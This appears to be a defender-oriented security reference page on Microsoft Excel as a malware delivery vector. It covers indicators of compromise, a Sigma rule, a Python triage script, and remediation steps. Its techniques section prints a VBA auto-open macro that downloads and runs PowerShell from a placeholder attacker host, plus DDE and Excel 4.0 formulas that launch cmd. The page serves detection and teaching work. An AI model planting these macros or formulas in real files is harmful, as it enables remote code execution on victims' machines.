EXCEL.EXE (Office application) - Microsoft Excel Security Analysis
EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vector**. Attackers abuse Excel via **malicious macros (VBA)**, **DDE attacks**, and **formula injection**. Excel spawning cmd.exe or PowerShell is a **near-certain indicator of compromise**.
Risk Summary
HIGH priority for SOC triage. EXCEL.EXE is a common malware delivery vector. Excel spawning cmd.exe, powershell.exe, or wscript.exe indicates **active compromise**. Monitor for macro execution, unusual child processes, and suspicious file opens.
Overview
What is EXCEL.EXE?
Microsoft Excel is a spreadsheet application and part of Microsoft Office.
Why It's Dangerous
Malware Vector:
- VBA macro execution
- DDE command execution
- Formula injection
- OLE embedded objects
Security Significance
- Phishing Favorite: #1 attachment type
- Macro Malware: Persistent threat
- Trusted Application: Business-critical
- Code Execution: VBA is powerful
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Microsoft Office...\EXCEL.EXE |
| Parent | explorer.exe (user open) |
| User | Logged-in user |
| Children | None typically |
Normal Child Processes
EXCEL.EXE
├── splwow64.exe (printing)
└── (none typically)
CRITICAL: Excel should NOT spawn:
- cmd.exe
- powershell.exe
- wscript.exe
- mshta.exe
Common Locations
C:\Program Files\Microsoft Office\root\Office*\EXCEL.EXE
C:\Program Files (x86)\Microsoft Office\root\Office*\EXCEL.EXE
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Parent: explorer.exe
Children: None or splwow64.exe
Behavior: Normal spreadsheet use
SUSPICIOUS (Compromise Indicators)
Children: cmd.exe → CRITICAL
powershell.exe → CRITICAL
wscript.exe → CRITICAL
mshta.exe → CRITICAL
Behavior: Network connections on open
Downloading executables
Immediate Red Flags
| Child Process | Risk |
|---|---|
| cmd.exe | CRITICAL - Active compromise |
| powershell.exe | CRITICAL - Active compromise |
| wscript.exe | CRITICAL - Active compromise |
| rundll32.exe | HIGH - Likely malicious |
Abuse Techniques
Attack Techniques
Technique #1: Malicious Macros (T1566.001)
VBA Macro Payload:
Sub AutoOpen()
Shell "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/ps')", vbHide
End Sub
Technique #2: DDE Attack (T1559.002)
DDE Formula:
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A1
Technique #3: Excel 4.0 Macros (XLM)
Legacy macro format, harder to detect:
=EXEC("cmd /c whoami")
Technique #4: Formula Injection
=cmd|' /c notepad'!A1
Detection Guidance
Detection Strategies
Priority #1: Excel Spawning Shells (CRITICAL)
Sigma Rule:
title: Excel Spawning Shell
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        ParentImage|endswith: '\EXCEL.EXE'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\wscript.exe'
            - '\mshta.exe'
    condition: selection
level: critical
Priority #2: Macro Execution Logging
Enable Office macro logging.
Priority #3: Network Connections
Process = "EXCEL.EXE" AND
NetworkConnection = true AND
Destination NOT IN trusted_sites
→ ALERT: HIGH
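As an added example (not code from the original page), the following Python applies the Sigma rule above, the severity table from "Immediate Red Flags" (rundll32.exe as HIGH), and the Priority #3 network rule to constructed Sysmon-style events; the field names and the trusted_sites allow-list are assumptions.

```python
from typing import Optional

# Severity table mirroring the page's Sigma rule and "Immediate Red Flags".
CRITICAL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe"}
HIGH_CHILDREN = {"rundll32.exe"}
# Constructed allow-list standing in for the page's `trusted_sites` (assumption).
TRUSTED_SITES = {"officecdn.microsoft.com", "login.microsoftonline.com"}

def _basename(path: str) -> str:
    """Case-insensitive image basename, so matching works like Sigma's endswith."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_process_creation(event: dict) -> Optional[str]:
    """Priority #1: EXCEL.EXE spawning a flagged child -> CRITICAL or HIGH."""
    if _basename(event.get("ParentImage", "")) != "excel.exe":
        return None
    child = _basename(event.get("Image", ""))
    if child in CRITICAL_CHILDREN:
        return "CRITICAL"
    if child in HIGH_CHILDREN:
        return "HIGH"
    return None  # e.g. splwow64.exe (printing) is expected

def triage_network_connection(event: dict) -> Optional[str]:
    """Priority #3: Excel connecting outside trusted_sites -> HIGH."""
    if _basename(event.get("Image", "")) != "excel.exe":
        return None
    host = event.get("DestinationHostname", "").lower()
    return "HIGH" if host and host not in TRUSTED_SITES else None

def triage(events: list) -> list:
    """Return (severity, event type, image) for every event that fires a rule."""
    alerts = []
    for ev in events:
        sev = None
        if ev["EventType"] == "ProcessCreate":
            sev = triage_process_creation(ev)
        elif ev["EventType"] == "NetworkConnect":
            sev = triage_network_connection(ev)
        if sev:
            alerts.append((sev, ev["EventType"], ev.get("Image")))
    return alerts

# Constructed sample events with Sysmon-like field names (not real telemetry).
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": EXCEL, "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventType": "ProcessCreate", "ParentImage": EXCEL, "Image": r"C:\Windows\splwow64.exe"},
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventType": "ProcessCreate", "ParentImage": EXCEL, "Image": r"C:\Windows\System32\rundll32.exe"},
    {"EventType": "NetworkConnect", "Image": EXCEL, "DestinationHostname": "officecdn.microsoft.com"},
    {"EventType": "NetworkConnect", "Image": EXCEL, "DestinationHostname": "payload-host.example"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```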
Remediation Steps
Protection and Remediation
Defense: Disable Macros
Group Policy:
Block macros in files from Internet
Disable all macros except digitally signed
Defense: ASR Rules
Enable Attack Surface Reduction:
- Block Office apps from creating child processes
- Block Office macros from making Win32 API calls
If Compromise Suspected
- Terminate Excel immediately
- Preserve the malicious document
- Identify child processes spawned
- Check for downloaded payloads
- Review macro code
- Hunt for persistence
Investigation Checklist
- Identify the document that was opened
- Preserve document for analysis
- Check for child processes (cmd, powershell)
- Review network connections
- Extract and analyze macros
- Check for downloaded files
- Review document origin (email?)
- Hunt for persistence mechanisms